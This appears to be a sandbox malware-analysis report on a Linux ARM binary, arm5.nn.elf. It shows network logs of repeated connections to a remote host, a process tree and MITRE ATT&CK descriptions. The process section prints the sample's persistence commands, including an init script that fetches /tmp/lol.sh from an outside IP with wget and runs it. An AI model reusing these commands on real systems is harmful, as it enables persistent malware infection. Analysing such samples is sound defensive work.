Dec 24, 2024 06:49:19.265671015 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:19.724026918 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:19.724169016 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:20.101886034 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:20.221492052 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:20.221590996 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:20.221668959 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:20.341284037 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:20.727686882 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:20.893656015 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:21.344176054 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:21.344307899 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:21.729381084 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:21.848949909 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:21.849164963 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:21.849227905 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:21.968693018 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:22.355554104 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:22.517616034 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:22.973095894 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:22.973293066 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:23.357228994 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:23.476885080 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:23.477077007 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:23.477077007 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:23.596652985 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:23.982716084 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:24.149679899 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:24.612385988 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:24.612543106 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:24.984436989 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:25.104187965 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:25.104300022 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:25.104362965 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:25.223925114 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:25.610363960 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:25.777800083 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:26.237086058 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:26.237349033 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:26.611593962 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:26.731408119 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:26.731739044 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:26.731976986 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:26.851576090 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:27.238734961 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:27.401702881 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:27.849112034 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:27.849349976 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:28.240602970 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:28.360227108 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:28.360454082 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:28.360454082 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:28.480009079 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:28.865740061 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:29.025631905 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:29.479971886 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:29.480178118 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:29.867410898 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:29.986995935 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:29.987160921 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:29.987204075 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:30.107012987 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:30.493513107 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:30.661658049 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:31.108629942 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:31.108817101 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:31.495488882 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:31.615286112 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:31.615431070 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:31.615583897 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:31.735028982 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:32.122703075 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:32.285631895 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:32.742634058 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:32.742839098 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:33.123986959 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:33.243618965 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:33.243779898 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:33.243779898 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:33.363323927 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:33.750226974 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:33.917727947 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:34.363728046 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:34.363976002 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:34.753305912 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:34.872921944 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:34.873178959 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:34.873404026 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:34.992945910 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:35.381603003 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:35.545650005 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:36.003747940 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:36.003964901 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:36.383270025 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:36.502904892 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:36.503058910 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:36.503158092 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:36.622644901 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:37.010009050 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:37.173649073 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:37.627124071 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:37.627294064 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:38.012063980 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:38.131846905 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:38.132011890 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:38.132209063 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:38.251698017 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:38.640239000 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:38.805619955 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:39.257189035 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:39.257352114 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:39.641897917 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:39.761522055 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:39.761621952 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:39.761671066 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:39.881196976 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:40.267396927 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:40.433662891 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:40.887954950 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:40.888164997 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:41.269181013 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:41.388691902 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:41.389053106 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:41.389069080 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:41.508641958 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:41.895911932 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:42.057709932 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:42.512846947 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:42.513004065 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:42.897608995 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:43.017338037 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:43.017420053 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:43.017494917 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:43.137023926 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:43.523335934 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:43.685615063 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:44.146100998 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:44.146233082 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:44.524806976 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:44.644354105 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:44.644479990 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:44.644566059 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:44.765208006 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:45.150948048 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:45.313596010 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:45.775777102 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:45.775917053 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:46.152679920 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:46.272270918 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:46.272367001 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:46.272433043 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:46.392029047 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:46.778677940 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:46.941627026 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:47.403903961 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:47.404093981 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:47.780419111 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:47.899959087 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:47.900073051 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:47.900124073 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:48.019591093 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:48.405651093 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:48.565581083 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:49.022851944 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:49.023025990 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:49.407294035 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:49.526859045 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:49.526997089 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:49.527075052 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:49.646605968 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:50.033354044 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:50.197525978 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:50.649930000 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:50.650096893 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:51.035058975 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:51.154661894 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:51.154783010 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:51.154875040 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:51.274393082 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:51.660816908 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:51.825557947 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:52.274564028 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:52.274712086 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:52.662637949 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:52.782274008 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:52.782406092 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:52.782485008 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:52.902008057 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:53.290111065 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:53.457696915 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:53.913431883 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:53.913702965 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:54.291874886 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:54.411463976 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:54.411578894 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:54.411724091 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:54.531250954 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:54.917680979 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:55.077712059 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:55.532675028 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:55.532838106 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:55.919526100 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:56.039098978 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:56.039334059 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:56.039406061 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:56.159046888 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 06:49:56.547111988 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:49:56.709644079 CET	38242	60160	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: arm5.nn.elf PID: 6239, Parent PID: 6161

General

Start time (UTC):	05:47:50
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	/tmp/arm5.nn.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:50
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:50
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/arm5.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/tmp/arm5.nn.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	05:47:50
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:47:50
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:47:51
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	05:47:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	05:47:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

